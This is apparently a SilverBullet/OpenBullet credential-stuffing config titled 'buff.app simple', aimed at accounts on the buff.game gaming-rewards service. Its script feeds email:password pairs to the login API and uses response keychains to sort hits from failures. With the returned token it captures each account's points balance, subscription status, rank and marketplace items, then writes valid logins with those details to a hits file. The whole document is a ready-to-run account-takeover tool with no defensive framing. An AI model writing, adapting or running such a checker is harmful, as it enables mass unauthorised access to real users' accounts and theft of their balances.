[SETTINGS]
{
  "Name": "buff.app simple",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2021-10-31T09:30:21.2265399+01:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "simple",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "buff",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST POST "https://app.buff.game/api/accounts/login" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Invalid login or password!" 
    KEY "Unauthorized" 
    KEY "401" 
    KEY "false" 
    KEY "login must be longer than or equal to 1 characters" 
    KEY "login must be longer than or equal to 1 characters\"" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "Account email not verified!\"}" 
  KEYCHAIN Success OR 
    KEY "refreshTokenLife" 
    KEY "tokenLife" 
    KEY "true" 

PARSE "<SOURCE>" LR "\":{\"token\":\"" "\",\"" -> VAR "tok" 

REQUEST GET "https://app.buff.game/api/accounts/current" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Authorization: <tok>" 

PARSE "<SOURCE>" LR "\",\"balance\":" ",\"" CreateEmpty=FALSE -> CAP "Points" 

PARSE "<SOURCE>" LR ",\"hasSubscription\":" ",\"" CreateEmpty=FALSE -> CAP "Sub" 

PARSE "<SOURCE>" LR ",\"level\":\"" "\",\"" CreateEmpty=FALSE -> CAP "Rank" 

REQUEST GET "https://app.buff.game/api/marketplace/items/my?page=1&limit=100" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Authorization: <tok>" 

PARSE "<SOURCE>" LR "\",\"name\":\"" "\",\"" Recursive=TRUE CreateEmpty=FALSE -> CAP "" 

UTILITY File "BUFF.txt" AppendLines "<USER>:<PASS> Rank: <Rank> Sub: <Sub> Points: <Points>" 

